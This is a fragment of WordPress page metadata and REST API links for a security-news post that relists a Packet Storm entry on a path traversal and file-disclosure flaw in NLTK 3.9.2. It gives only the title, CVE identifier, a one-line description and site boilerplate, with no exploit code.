- zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=49308","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 NLTK 3.9.2 Path Traversal \/ File Disclosure_PACKETSTORM:219788 - zero redgem","og_description":"{“lastseen”:”2026-04-24T22:30:40″,”description”:”NLTK version 3.9.2 suffers from a path traversal vulnerability that allows for file disclosure…”,”published”:”2026-04-24T00:00:00″,”modified”:”2026-04-24T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 NLTK 3.9.2 Path Traversal \/ File Disclosure”,”source”:””,”references”:””,”id”:”PACKETSTORM:219788″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-0847″],”sourceData”:”==================================================================================================================================n | # Title :...","og_url":"https:\/\/zero.redgem.net\/?p=49308","og_site_name":"zero redgem","article_published_time":"2026-04-24T17:48:56+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"15 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=49308#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=49308"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 NLTK 3.9.2 Path Traversal \/ File Disclosure_PACKETSTORM:219788","datePublished":"2026-04-24T17:48:56+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=49308"},"wordCount":2888,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-8.6","exploit","HIGH","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=49308#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=49308","url":"https:\/\/zero.redgem.net\/?p=49308","name":"\ud83d\udcc4 NLTK 3.9.2 Path Traversal \/ File Disclosure_PACKETSTORM:219788 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-04-24T17:48:56+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=49308#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=49308"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=49308#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 NLTK 3.9.2 Path Traversal \/ File Disclosure_PACKETSTORM:219788"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/49308","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=49308"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/49308\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=49308"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=49308"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=49308"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}